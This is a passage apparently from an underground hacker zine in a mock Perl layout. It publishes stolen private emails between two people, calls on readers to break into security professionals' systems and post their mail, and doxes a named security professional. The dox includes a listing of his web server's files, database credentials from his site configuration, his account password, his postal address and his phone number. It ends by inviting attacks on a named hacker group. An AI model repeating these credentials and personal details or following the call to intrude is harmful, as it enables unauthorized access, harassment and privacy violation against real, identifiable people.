Jules P.S. you are sooooo in love with her ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 9:42 PM NO, no love :P haha always good to keep your bases covered ... She's coming over tonight, hmmmmmm ... It's going to be hard to be well behaved ... I hate sleeping with people I like ... Things get messy!! Damn my confusing head, this is why I avoid letting myself feel anything for anyone heh ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 9:39 PM Oh and just a thought – if you declare your dieing love for her and she turns around and says she doesn’t feel the same way about you….then say “pft haha kidding, it was a joke – as if I would be in love with you :(“ and cry when she cant see you……keep your bases covered hahaha ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 9:36 PM Oh I won't forget! If I fall in love I will come after you and exact my vengeance :P ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 9:34 PM Thats my boy….and don’t forget me when you are all giddy and in love! ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 8:35 PM haha I like the way you think ... Reminds me of me ... All though I'm trying to be nice or something at the moment ... but yeh fuck it, I'll do it!!!! ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 8:25 PM Do you know the other guy? No? then who cares!! Blunt but hey that’s life!! And just talk it thru with her first, tell her you aren’t proposing this could be a good short thing….so if she wants to leave the guy she is with and give it a go then yippee! If not….then she shouldn’t have hooked up and did ‘you know what’ on the weekend with you now should she! :Pe ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 8:23 PM Haha indeed. .... (by the way, most women are anyway) <<< haha no doubt!!! Keeps life exciting though ... I'm just trying to get rid of all my stalkers as it is heh ... Not that I think she would be like that ... Ahh well, I might pursue it and see what happens I suppose ... I really hate destroying relationships if I'm actually going to try and go out with the girl though ;P ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 8:20 PM Well you cant let past experiences ruin new ones!! I would do it if I was you!! and whats the worse that can happen – if she turns into a psycho (by the way, most women are anyway) then get rid of her, change your number and move interstate :) hahaha ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 8:15 PM yah that's what she means!! heh she's a good friend ... Well it was just an example ... guess she doesn't think I'm the type for girlfriends ;P ahhh such drama ;) haha ... it's just the last girl I decided to go out with, started like this ... boyfriend thing etc, then it just got messy ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 8:11 PM Ok so I guess that means she cant believe you want a GF? Yeah? Who is she? Do you care what she thinks? Or is this the girl you like? ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 8:07 PM Haha no I'm not a pig ;P Well not if I may like someone ... haha fuck, this is what I mean ... I just said to someone I was thinking of getting a girlfriend soon and this conversation followed : ..x4d..x69..x6c says: ive decided i might try and get a girlfriend soon lol ..x4d..x69..x6c says: fucking msn BaRbI hAs LoSt Da PlOt!!! says: fuck wait are u sick BaRbI hAs LoSt Da PlOt!!! says: i just read that BaRbI hAs LoSt Da PlOt!!! says: BaRbI hAs LoSt Da PlOt!!! says: ahaha BaRbI hAs LoSt Da PlOt!!! says: jules BaRbI hAs LoSt Da PlOt!!! says: wants ..x4d..x69..x6c says: Hahah i know BaRbI hAs LoSt Da PlOt!!! says: a ..x4d..x69..x6c says: call me crazy! BaRbI hAs LoSt Da PlOt!!! says: girlfirned BaRbI hAs LoSt Da PlOt!!! says: BaRbI hAs LoSt Da PlOt!!! says: wait i need time to take this in ..x4d..x69..x6c says: shhh BaRbI hAs LoSt Da PlOt!!! says: i just got a msg from that guy in melbourne BaRbI hAs LoSt Da PlOt!!! says: alright im still not over the shock BaRbI hAs LoSt Da PlOt!!! says: ahng on ..x4d..x69..x6c says: Haha what shock ;P ..x4d..x69..x6c says: i could have a girlfriend ;P BaRbI hAs LoSt Da PlOt!!! says: hahaha so u got one in mind? ..x4d..x69..x6c says: yep! ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:57 PM well i think if yous like each other and have for a while then yous should go for it and if something happened over the weekend and then you stop contacting her then you will look like a pig......and you are not are you studd boy :P ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 7:55 PM Yeh, there's sort of been something between us for quite a long time, but we've never done anything about it ... Yeh not sure if she can be trusted, but I'd say she can ... Except for what she did on the weekend, but that's sort of different!! haha no i don't want to be alone forever ... but I'm still young, and being single is rather enjoyable..Also breaking up relationships gets annoying, hence the reason I was thinking I should just stop talking to her ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:49 PM so you picked her up even tho she had a BF? are yous close friends? or do you just kind of know her but there is a huge attraction? well dont take this the wrong way but if she is cheating on her BF with you then she either A cant be trusted or B is really into you so you should go for it! Dont like to get in relationships? why? what do you want to be alone for ever? noone is saying you should get married :P dont hold back scaredy cat ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 7:44 PM Yeh I picked up one .. but it was just awkward!! Well one reason is that she's got a boyfriend...another reason is that I usually avoid relationships, for various reasons ... but if she was single I probably would have gone for it ... feelings suck :P ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:41 PM So you did pick up or you didn’t? well that’s strange? Why cant you like her? Go for it stupid!! hahahah ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 7:30 PM haha I mean well behaved as in NOT picking them up ;P I even didn't pursue some which would have been really easy lol So in total there was only one, and it was strange .... I think I might like her or something ... So I'm not going to talk to her again just in case I fall for her :P ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:27 PM oh were you now?? you little studd! hahaha how many did we pick up this weekend ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 7:26 PM oh that haha ... and it was a friend, and she ended up deciding that she wanted to head out for some drinks somewhere, and I couldn't be bothered!!! AND I was well behaved when it came to women this weekend! ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:20 PM you said you were having a lady 'friend' over to 'watch' a movie?? hmmmmm ----------------- Original Message ----------------- From: Jules Date: Oct 2, 2006 7:18 PM haha yes i did! Didn't really do anything on Friday night, had an early night! by myself :o What movie??? hah yeh i'd never really played before, was pretty funny ----------------- Original Message ----------------- From: Cassie Date: Oct 2, 2006 7:15 PM well it sounds like you had fun too then :) and friday night....heyyyyyy! you forgot to mention your movie?? ohhhh i lurv yatzee its great! [/stud.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< [hack.txt] ----------------- Original Message ----------------- From: Jules Date: Oct 3, 2006 7:54 PM nOt very well by the looks of it!!! Just someone is trying to brute force my SSHd ... of course :P lol erm yah! but on the upside, im eating grilled cheese on toast! ----------------- Original Message ----------------- From: Cassie Date: Oct 3, 2006 7:37 PM ok? how do they do that ----------------- Original Message ----------------- From: Jules Date: Oct 3, 2006 7:33 PM Haha sucks! is it? Well it was i suppose, afternoon here now!!! ahhhhhhhhhhhhhhhh someones trying to hack meeeeeeeeeeee bastards ;P [/hack.txt] <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< EOMIL );} sub Scene { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOSCENE' "Times change and technology progresses. Attackers adept and attacks evolve. At this point in history, we can wax fondly for the halcyon days when computers were hacked for pride or ego -- the good ole' simpler times when underground hacker wars were electronically waged and the collateral damage was the main website of The New York Times. Or the Solaris machines that were owned and the high profile computer security icons that had their e-mail spools stolen and personal poetry publicly posted. Or the OpenBSD machines that were rumored to be silently owned and the early copies of the most lauded online underground hacker journal that were distributed months ahead of time. Good times. Nowadays, there is no underground hacker scene -- not like there used to be (bring back BoW and Hagis!)." -- Mike Schiffman from the introduction to _Hacker's_Challenge_3_ While route is indeed a whitehat sellout (and appears to like watching his co-workers be publicly humiliated), he is certainly correct about one thing: The Scene is IDLE. Not just a little idle, we're talking over a year of idleness here. Sure, occasionally groups attempt to make a stir. Undoubtedly, some of the readers will remember the PHC Delka Strike Force, hosted at http://el8.ru/x/ (now down). Or the release of the epic h0no3 about one year ago. And of course, our own fun little contributions. However, despite the hard work of a number of individuals, many of the goals originally set forth for pr0j3kt m4yh3m by el8 and the Phrack High Council have yet to be accomplished. This needs to change. Instead of chatting on IRC all day, go out and own a whitehat. Do a PHC mission. Contribute to pr0j3kt m4yh3m. The recent events revolving around the blogger known as "InfoSec Sellout" bring an interesting point to light. When the older "security professionals" discovered the "fact" that InfoSec Sellout was LMH and was backed by PHC, it caused quite a stir for those that remembered the heyday of the pr0j3kt. For the whitehats that had just entered the industry post-whitehat holocaust, it didn't mean a thing. They simply assumed (like 90% of the HTS userbase) that PHC was/is a group of dissatisfied script kiddies. Too bad all the evidence points to the contrary. Another sad fact is that whitehats have not only taken over the public side of the scene, but the private side as well. These "revelations" about InfoSec Sellout at one time would have come from an anonymous post to FD, from a member of the underground. Now they come from a "respected security professional". Instead of talking about the activities of real hackers, the gossip reels these days deal with the exploits of whitehats like David Maynor, HD Moore and others. Is this what we've allowed the scene to become? A bunch of idlers thinking about fat middle aged whitehats? Where's the rage? Where's the dedication to the eradication of the greedy security consultants? Where's all the activity that was prevalent in the scene until recently? A time has come for a change. Follow the example dikline set out. Take back the scene! Go out and actually hack. Don't post exploits to FD; post a whitehat's spools! Continue the legacy of the glorious pr0j3kt m4yh3m! Never sell out, never surrender. EOSCENE );} sub Bambenek { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; own($self, <<'EOBAMBENEK' John Bambenek is the Assistant Politics Editor for BC Magazine and is an academic professional for the University of Illinois. By trade, he is an information security professional, part of the Internet Storm Center and a courseware author and certification grader for the GIAC family of security certifications. He is a syndicated columnist who blogs at Part-Time Pundit and the executive director of The Tumaini Foundation which helps AIDS orphans and other children in Tanzania to get an education. John Bambenek is a man of many trades: An assistant politics editor; an academic "professional" for the university of Illinois; an information security "specialist"; author and grader of the GIAC security certs. He also loves to blog bullshit. Despite his background charity work, the internet does not make exceptions - speaking out of turn will get you owned. Bambenek loves blogging so much he has four, yes four, blogs ( www.bloggernews.net, www.mensdailynews.com, thewideawakes.org and his site www.parttimepundit.com ). Now you may be wondering what it is Bambenek has done wrong. Well, despite being a self-loving whitehat(burn) and talking more shit than a cess pit with a mouth, it wasn't either of these reasons that forced us into action. This guy actually insulted us personally. I assume all of you have read P64 and probably enjoyed it (if you saw past the typos, but I won't mention that here). If you're reading this, John, it should be coming clear now shouldn't it? I'd like to point you all to http://blogcritics.org/archives/2007/06/05/183157.php This is Bambenek's review of P64 - I think he probably believes he has some authority to speak about the "underground" because of his security certifications and time at ISS. Well John, you are either the dumb piece of shit we think you are, or you like being rm'd and having your emails read. Lets take a peak at the review. ##Quote 1## "As an information security professional, lately I've become quite bored. The state of hacking today seems to be almost solely employed by the spammer-class of miscreants looking to make as much money as quickly as possible. It's big business now. As such, they continue to exploit the same weaknesses, again and again, and simply lack the spirit and ingenuity of previous generations of hackers." ## I bet the first five words of most of your security related blogs begin that way don't they? Same old whitehat drivel. I can also assure you John, we aren't all trying to sell our exploits on wslabi, and to be honest John, you spam more shit than anyone. Four blogs? All mirroring the same bullshit? ##Quote 2## "Hacking has been commoditized. With spammers running the show whose bottom-line is money, information security threats have become quantifiable, systemitizable, and predictable. Occasionally there are some really neat new security hacks, the WMF exploit and the ANI exploit come to mind, but by and large, it's the same old stupid tricks done and redone. This is because they continue to exploit the weakest link, the unsophisticated PC user who will still fall prey to 419 scams after all these years. Upwards of 80% of people will click on phishing e-mails if the message looks "good" enough, such as through a social networking site. Any idiot can own hardware now… and they do. It's quantity over quality." ## Generalising. Did you predict this attack? As a side note, you have only discovered one public bug (harvesting bugs for wslabi?), you lack skill John. I don't even know how you can consider yourself a security professional. ##Quote 3## "At the same time, many of the old school hacker groups have sold out. Instead of continuing to work on their craft, they've gone to work for the highest bidder. As a result, the old hacking vitality has been lost." ## Yes, all our exploits belong to wslabi. You know nothing about hacking dude (quit monitoring SANS stats, might get you somewhere), this article will totally discredit you in the security industry and deservedly so. We respect your right to blog, but this next quote really took it too far, especially in terms of lolz. ##Quote 4## "I wouldn't be doing the job I do if it weren't for hacking; the problem is that you're boring the hell out of me." ## Wait, we're boring you? Dude even with your mail spools combined, you are much...much more boring than anyone or anything, and that includes FD mailing list. ##Quote 5## "I have some sympathy for their underground and anti-authority tendencies, though I've not participated in the underground." ## Lies. Bambenek == Maynor == LMH == Infosec sellout. Fuck your sympathy dude, good luck with your perfect life, I should throw Tyler Durden quotes at you. 30 years old and never had a woman :/ ##Quote 6## âThe reason there is often a delay is that a lot of the people who actually install a lot of these keylogger programs are not that sophisticated, Bambenek said. In most cases, they're teenage hackers who flip the information to more organized criminal groups for some quick cash.â ## Yeah man, fuck those keyloggers!?! 0day can happen to anyone...but more likely the retarded (Copyright Raven 2007) ##Quote 7## "I was in a Washington Post article today in which I basically was quoted calling all the online credit card thiefs n00bs. I’m starting a pool, how long til they DoS me…" ## Typical whitehat response, we are probably script kiddies because we owned you. The truth is dude, you are the n00b here (see below for password l0lz). And as for DoS? meh, no one visits your site. Anyway, I guess its time to drop some d0x :D # ls -la /home/john1/public_html total 276 drwxr-x--- 24 john1 nobody 4096 May 29 11:58 . drwx--x--x 29 john1 john1 4096 Jul 30 10:49 .. -rwxr-xr-x 1 john1 john1 0 Nov 26 2002 404.shtml -rw-r--r-- 1 john1 john1 2558 May 4 2005 about.php -rw-r--r-- 1 john1 john1 1845 Sep 7 2006 adsense.html -rwxr-xr-x 1 john1 john1 2327 Dec 29 2003 atroot.php drwxr-xr-x 3 john1 john1 4096 Jun 4 00:17 bambenek drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 cgi-bin -rw-r--r-- 1 john1 john1 58767 Jan 12 2006 client.htm -rw-r--r-- 1 john1 john1 233 Aug 14 2006 contact.php drwxr-xr-x 4 john1 john1 4096 Dec 20 2005 cpm -rwxr-xr-x 1 john1 john1 18204 Mar 12 2004 diediedie drwxrwxrwx 3 john1 john1 4096 Dec 20 2005 document_repository.old -rw-r--r-- 1 john1 john1 5305 Aug 14 2006 footer.php -rw-r--r-- 1 john1 john1 2993 May 4 2005 header.php -rw-r--r-- 1 john1 john1 0 Dec 24 2006 .htaccess -rwxr-xr-x 1 john1 john1 0 Oct 4 2002 .htaccess.1033756819 -rwxr-xr-x 1 john1 john1 0 Aug 11 2003 .htaccess.1060623240 -rwxr-xr-x 1 john1 john1 355 Aug 12 2003 .htaccess.1060726978 -rwxr-xr-x 1 john1 john1 525 Dec 21 2006 .htaccess-20061221 drwxr-xr-x 3 john1 john1 4096 Dec 20 2005 images -rwxr-xr-x 1 john1 john1 15655 Jan 28 2004 index.html.old -rw-r--r-- 1 john1 john1 4773 Aug 14 2006 index.php drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 infosec #h8 drwxr-xr-x 13 john1 john1 4096 Jun 12 07:36 jcb drwxr-xr-x 2 john1 root 4096 May 28 13:52 jcb.dos drwxrwxrwx 2 john1 john1 4096 Dec 20 2005 L10.old -rw-r--r-- 1 john1 john1 692 May 4 2005 links.html drwxr-xr-x 4 john1 john1 4096 Jun 11 21:05 mim drwxr-xr-x 17 john1 john1 4096 May 31 22:03 mt drwxr-xr-x 4 john1 john1 4096 May 12 20:46 newsletter drwxr--r-- 3 john1 john1 4096 Dec 20 2005 old drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 old_web drwxr-xr-x 3 john1 john1 4096 Dec 20 2005 opcenter drwxr-xr-x 6 john1 john1 4096 Dec 20 2005 opendocman.olc drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 _private drwxr-xr-x 3 john1 john1 4096 May 21 2006 pundits -rw-r--r-- 1 john1 john1 0 Aug 14 2006 robots.txt -rw-r--r-- 1 john1 john1 1427 Apr 26 2005 security.php -rw-r--r-- 1 john1 john1 1951 Apr 25 2005 server.php drwxr-xr-x 2 john1 john1 4096 May 22 04:47 suspended.page drwxr-xr-x 3 john1 john1 4096 Jul 28 2006 techblog -rw-r--r-- 1 john1 john1 561 Apr 26 2005 thanks.php drwxr-xr-x 14 john1 john1 4096 May 19 22:04 tumaini drwxr-xr-x 5 john1 john1 4096 Aug 6 2006 tumaini.old -rw-r--r-- 1 john1 john1 6656 Dec 17 2006 wiki.txt ##writing your own wiki sux /home/john1/public_html/jcb: total 6252 drwxr-xr-x 13 john1 john1 4096 Jun 12 07:36 . drwxr-x--- 24 john1 nobody 4096 May 29 11:58 .. -rw-r--r-- 1 john1 john1 10553 May 27 2004 07-minister.jpg -rw-r--r-- 1 john1 john1 20176 Sep 1 2006 abort.jpg -rw-r--r-- 1 john1 john1 42 Feb 1 11:15 ac.html -rw-r--r-- 1 john1 john1 9786 Aug 27 2005 addesign1.gif -rw-r--r-- 1 john1 john1 11048 Aug 27 2005 addesign2.gif -rw-r--r-- 1 john1 john1 7861 Aug 27 2005 addesign3.gif -rw-r--r-- 1 john1 john1 131249 Dec 3 2006 agi.png -rw-r--r-- 1 john1 john1 42 Apr 29 15:19 alexa.html -rw-r--r-- 1 john1 john1 42 Apr 29 15:19 amazon.html drwxr-xr-x 61 john1 john1 4096 Aug 18 2006 archives -rw-rw-rw- 1 john1 john1 92668 Aug 18 2006 archives.html -rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 atom.xml -rw-r--r-- 1 john1 john1 1714 Aug 27 2005 bah.gif -rw-r--r-- 1 john1 john1 9703 Aug 27 2005 banner10.gif -rw-r--r-- 1 john1 john1 97388 Aug 27 2005 banner11.gif -rw-r--r-- 1 john1 john1 14805 Aug 29 2006 bannertest.html -rw-r--r-- 1 john1 john1 42 Feb 9 2000 bc.gif -rw-r--r-- 1 john1 john1 42 Jan 26 2006 bc.html -rw-r--r-- 1 john1 john1 18439 Mar 20 2006 blogMadBlue.gif -rw-r--r-- 1 john1 john1 42 Jan 13 2006 bnn.gif -rw-r--r-- 1 john1 john1 42 Jan 26 2006 bnn.html -rw-r--r-- 1 john1 john1 141505 Aug 27 2005 botv.gif -rw-r--r-- 1 john1 john1 2562 Aug 23 2006 br-staclu.html -rw-r--r-- 1 john1 john1 9111 Jan 22 2006 cash2.gif -rw-r--r-- 1 john1 john1 6622 Jan 22 2006 cash.gif -rw-r--r-- 1 john1 john1 22266 Aug 27 2005 cfr.gif drwxr-xr-x 2 john1 john1 4096 Aug 27 2005 cgi-bin -rw-r--r-- 1 john1 john1 2825 Aug 23 2006 clock.jpg -rw-r--r-- 1 john1 john1 9707 Aug 27 2005 coalition_1.gif -rw-r--r-- 1 john1 john1 6519 Jan 3 2007 coulter.txt -rw-r--r-- 1 john1 john1 13106 Mar 9 17:38 dailyshow.jpg -rw-r--r-- 1 john1 john1 11255 Nov 8 2006 dijcb.gif -rw-r--r-- 1 john1 john1 16 Feb 3 12:26 dirzap.com.txt -rw-r--r-- 1 john1 nobody 4212 Nov 22 2006 error_log -rw-r--r-- 1 john1 john1 359 Aug 23 2006 fantastico_fileslist.txt -rw-r--r-- 1 john1 john1 36 Aug 23 2006 fantversion.php -rw-r--r-- 1 john1 john1 2408 Nov 27 2006 fem-tshirt.txt -rw-r--r-- 1 john1 john1 5274 May 4 14:50 france.txt -rw-r--r-- 1 john1 john1 336903 Jan 1 2005 freegas.jpg -rw-r--r-- 1 john1 john1 42 Jan 13 2006 freep.gif -rw-r--r-- 1 john1 john1 42 Jan 26 2006 freep.html -rw------- 1 john1 john1 15 Jul 23 05:00 .ftpquota -rw-r--r-- 1 john1 john1 0 Jan 27 2007 google4247998986f13f3e.html -rw-r--r-- 1 john1 john1 22773 Jun 11 21:09 gov1.jpg -rw-r--r-- 1 john1 john1 11918 Aug 27 2005 greenzapbanner.gif -rw-r--r-- 1 john1 john1 170 Dec 21 2006 .htaccess -rw-r--r-- 1 john1 john1 1502 Dec 21 2006 .htaccess.old -rw-r--r-- 1 john1 john1 0 Dec 19 2006 iapc.html drwxrwxrwx 3 john1 john1 4096 Dec 20 2005 images -rw-r--r-- 1 john1 john1 146093 Apr 6 2006 immig.gif -rw-rw-rw- 1 john1 john1 23664 Aug 20 2006 index2.php -rw-rw-rw- 1 john1 john1 81702 Aug 18 2006 index.html.old -rw-rw-rw- 1 john1 john1 81702 Mar 8 11:37 index.html.old2 -rw-r--r-- 1 john1 john1 94 May 19 21:53 index.php -rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 index.rdf -rw-r--r-- 1 john1 john1 81702 Aug 20 2006 index-test.html -rw-rw-rw- 1 john1 john1 86298 Jul 30 11:15 index.xml -rw-r--r-- 1 john1 john1 363 Sep 2 2006 info.txt -rwxr--r-- 1 john1 john1 44121 Aug 27 2005 IntlLawFinal.pdf -rw-r--r-- 1 john1 john1 42 Aug 3 2006 ir.html -rw-r--r-- 1 john1 john1 404 Aug 27 2005 jcb4scotus.gif -rw-r--r-- 1 john1 john1 4163 Aug 27 2005 jcb.jpg -rw-r--r-- 1 john1 john1 817087 May 19 21:53 latest.tar.gz -rw-r--r-- 1 john1 john1 15127 May 19 21:53 license.txt -rwxr--r-- 1 john1 john1 10999 Aug 27 2005 macosx.html drwxr-xr-x 2 john1 john1 4096 Dec 8 2005 maillist -rw-r--r-- 1 john1 john1 11216 Aug 27 2005 milblogs0.jpg -rw-r--r-- 1 john1 john1 42 Aug 2 2006 mnd.html lrwxrwxrwx 1 john1 john1 5 Dec 20 2005 mt -> ../mt -rw-r--r-- 1 john1 john1 20681 Aug 27 2005 mt.old.cfg -rw-rw-rw- 1 john1 john1 137 Aug 27 2005 mtview.php -rw-r--r-- 1 john1 john1 2137 Nov 28 2006 nativity-ad.jpg -rw-r--r-- 1 john1 john1 91 Aug 27 2005 nav-commenters.gif -rw-r--r-- 1 john1 john1 129633 Jan 4 2005 nccod1.jpg -rw-r--r-- 1 john1 john1 110047 Jan 4 2005 nccod2.jpg -rw-r--r-- 1 john1 john1 122711 Jan 4 2005 nccod3.jpg -rw-r--r-- 1 john1 john1 121305 Jan 4 2005 nccod4.jpg -rw-r--r-- 1 john1 john1 115635 Jan 4 2005 nccod5.jpg -rw-r--r-- 1 john1 john1 151873 Jan 4 2005 nccod6.jpg drwxr-xr-x 3 john1 john1 4096 Dec 28 2006 newsletter drwxr-xr-x 2 john1 john1 4096 Dec 20 2005 papers -rw-r--r-- 1 john1 john1 378 Aug 23 2006 pers-br.php -rw-r--r-- 1 john1 john1 42 Jan 13 2006 plb.gif -rw-r--r-- 1 john1 john1 42 Sep 1 2006 plb.html drwxrwxrwx 4 john1 john1 4096 Nov 11 2006 podpress_trac -rw-r--r-- 1 john1 john1 95705 May 30 2006 portfolio.pdf -rw-r--r-- 1 john1 john1 1435 Aug 27 2005 prolifeblogs.gif -rw-r--r-- 1 john1 john1 7631 May 19 21:53 readme.html -rw-r--r-- 1 john1 john1 72 Jun 3 23:10 referrals.html -rwxr--r-- 1 john1 john1 84598 Aug 27 2005 resume-m.pdf -rw-rw-rw- 1 john1 john1 22115 Aug 18 2006 right.html -rw-r--r-- 1 john1 john1 0 Aug 14 2006 robots.txt -rw-rw-rw- 1 john1 john1 496 Jul 28 2006 rsd.xml -rw-r--r-- 1 john1 john1 64408 Sep 6 2006 rvj.jpg -rw-r--r-- 1 john1 john1 753664 Sep 6 2006 rvj.png -rw-rw-rw- 1 john1 john1 81510 Aug 18 2006 rwbsite.php -rw-rw-rw- 1 john1 john1 1384 Sep 17 2005 rwb-styles.css -rwxr--r-- 1 john1 john1 452782 Aug 27 2005 sco.png -rw-r--r-- 1 john1 john1 7331 Aug 27 2005 scotus.gif -rw-rw-rw- 1 john1 john1 23664 Aug 20 2006 sidebar.html -rwxr-xr-x 1 nobody john1 198166 Jul 29 18:46 sitemap.xml -rw-r--r-- 1 nobody john1 12712 Jul 29 18:46 sitemap.xml.gz -rwxr--r-- 1 john1 john1 6794 Aug 27 2005 solcd.html -rw-r--r-- 1 john1 john1 42 Jan 13 2006 staclu.gif -rw-r--r-- 1 john1 john1 42 Jan 26 2006 staclu.html -rw-r--r-- 1 john1 john1 12509 Aug 27 2005 stem.jpg -rw-r--r-- 1 john1 john1 378 Aug 23 2006 stop2.php -rw-r--r-- 1 john1 john1 193 Aug 23 2006 stop-br.html -rw-r--r-- 1 john1 john1 3649 Aug 27 2005 styles-site.css -rw-r--r-- 1 john1 john1 61571 Jan 1 2005 sunswag.jpg -rw-r--r-- 1 john1 root 1603 Jul 7 2006 tagblitz.gif -rw-r--r-- 1 john1 john1 65740 Jan 1 2005 tanz-pcs1.JPG -rw-r--r-- 1 john1 john1 75289 Jan 1 2005 tanz-pcs2.JPG drwxr-xr-x 2 john1 john1 4096 Nov 20 2006 templates_c -rw-r--r-- 1 john1 john1 532 May 26 2006 test2.html -rw-r--r-- 1 john1 john1 42 Jan 26 2006 test.html -rw-r--r-- 1 john1 john1 42 Jan 5 2007 th.html -rw-r--r-- 1 john1 john1 56520 Nov 29 2006 tumaini-di.jpg -rw-r--r-- 1 john1 john1 3569 Aug 27 2005 tw4s.html -rw-r--r-- 1 john1 john1 42 Jan 13 2006 twa.gif -rw-r--r-- 1 john1 john1 42 Jan 26 2006 twa.html -rw-r--r-- 1 john1 john1 163747 Nov 7 2006 vote.jpg -rw-r--r-- 1 john1 john1 12719 Nov 22 2005 vp-1a.jpg -rw-r--r-- 1 john1 john1 48166 Nov 22 2005 vp-2a.jpg -rw-r--r-- 1 john1 john1 42 Aug 17 2006 war.html -rw-r--r-- 1 john1 john1 42 Feb 7 15:58 wikia.html -rw-r--r-- 1 john1 john1 11543 Jan 19 2006 wot.gif drwxr-xr-x 4 john1 john1 4096 May 19 21:53 wp-admin -rw-r--r-- 1 john1 john1 36179 May 19 21:53 wp-app.php -rw-r--r-- 1 john1 john1 127 May 19 21:53 wp-atom.php -rw-r--r-- 1 john1 john1 997 May 19 21:53 wp-blog-header.php -rw-r--r-- 1 john1 john1 2905 May 19 21:53 wp-comments-post.php -rw-r--r-- 1 john1 john1 151 May 19 21:53 wp-commentsrss2.php -rw-r--r-- 1 john1 john1 925 May 28 14:41 wp-config.php -rw-r--r-- 1 john1 john1 965 May 19 21:53 wp-config-sample.php drwxr-xr-x 8 nobody john1 4096 May 29 11:41 wp-content -rw-r--r-- 1 john1 john1 849 May 19 21:53 wp-cron.php -rw-r--r-- 1 john1 john1 120 May 19 21:53 wp-feed.php drwxr-xr-x 4 john1 john1 4096 May 19 21:53 wp-includes -rw-r--r-- 1 john1 john1 1517 May 19 21:53 wp-links-opml.php -rw-r--r-- 1 john1 john1 16022 May 19 21:53 wp-login.php -rw-r--r-- 1 john1 john1 5674 May 19 21:53 wp-mail.php -rw-r--r-- 1 john1 john1 291 May 19 21:53 wp-pass.php -rw-r--r-- 1 john1 john1 188 May 19 21:53 wp-rdf.php -rw-r--r-- 1 john1 john1 251 May 19 21:53 wp-register.php -rw-r--r-- 1 john1 john1 127 May 19 21:53 wp-rss2.php -rw-r--r-- 1 john1 john1 125 May 19 21:53 wp-rss.php -rw-r--r-- 1 john1 john1 9278 May 19 21:53 wp-settings.php -rw-r--r-- 1 john1 john1 3518 May 19 21:53 wp-trackback.php -rw-r--r-- 1 john1 john1 55008 May 19 21:53 xmlrpc.php -rw-r--r-- 1 john1 john1 42 Aug 28 2006 zimbio.html -rw-r--r-- 1 john1 john1 42 Dec 19 2006 zzzz.html // ** MySQL settings ** // define('DB_NAME', 'john1_wrdp1'); // The name of the database define('DB_USER', 'john1_wrdp1'); // Your MySQL username define('DB_PASSWORD', 'oQUgk8DQWjco'); // ...and password define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value Other than that, not really anything worth noting, other than his shitty self promoting news letters (Bambenek for president). John, any further comment and you will be owned again. Name: John Bambenek Mailing address: 715 Erin Dr Phone number: 217-493-0760 And on a final note, I'd like to finish this article on a note that will make everyone laugh (at John Bambenek). As a security consultant, you really would think he'd know better. A seven letter password, a word found in dictionaries, all lowercase, you find it on the beach? Similar to a stone? Well if you can guess it you you too can own John Bambenek. wtf kind of password is "pebbles"? If anyone employs you again to work in the security industry they are cleary more stupid than you are. One other thing, you are right, you wouldn't be in this job if it wasn't for hacking - so quit fucking leeching from what we create or you will be owned again and again. Just another disgruntled teenager trying to be nostalgic for a long passed era which I never even participated in. This relevant enough for you? cya John. EOBAMBENEK );} sub CF0 { ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; my $self = shift; say($self, <<'EOCF0' == Call For 0wning == Same deal as before. Own whoever you can and report it to us for elite prizes! Or just respect. == Results == I think it is fair to say that our first CF0 was a complete and utter rags-to-riches success story. Despite drawbacks (hakspace getting defaced and removed, every other site being redone) we still 0wned everything to do with psg. Our one sadness is that not one external group responded to our call, unless one of the many people owning psg was inspired by us and simply declined to contact us. We expect more this time. "In the End, we will remember not the words of our enemies, but the silence of our friends." - Martin Luther King Jr. == New Target: The Cult of the Dead Cow == The cDc are a group of media-focused attention-grabbing fucktards. These guys produce shitty content and then market it as if it means something. Sound familiar? Most definitely. They're awfully like psg, our last victim. In fact, they are so much like psg that they invited psg to be a member of their "Ninja Strike Force" wanksquad. The variety of cDc websites and content is simply designed to confuse you into thinking that they do something. In reality, all the cDc does is try to convince the world that they are a very important, top-of-the-world, hacking group. Let's start at the top. The cDc leader, Ratte', is a piece of noob. Yes, he has known how to type for decades. But what has he learned in that time huddling over his keyboard? Fuck all. Check out his Phrack profile. He was 14 when he started cDc. For years it was just a group that published dreadful and creative (read: non-technical) text files. Now they do that, plus audio and image files. You know how cDc tries to sell the image that it has been the shit in the hacker community since 1984? Yes, well, that's complete bullshit. And Ratte' knows it: "But what makes CULT OF THE DEAD COW different and has enabled us to last is that cDc has never been about technology" <- so 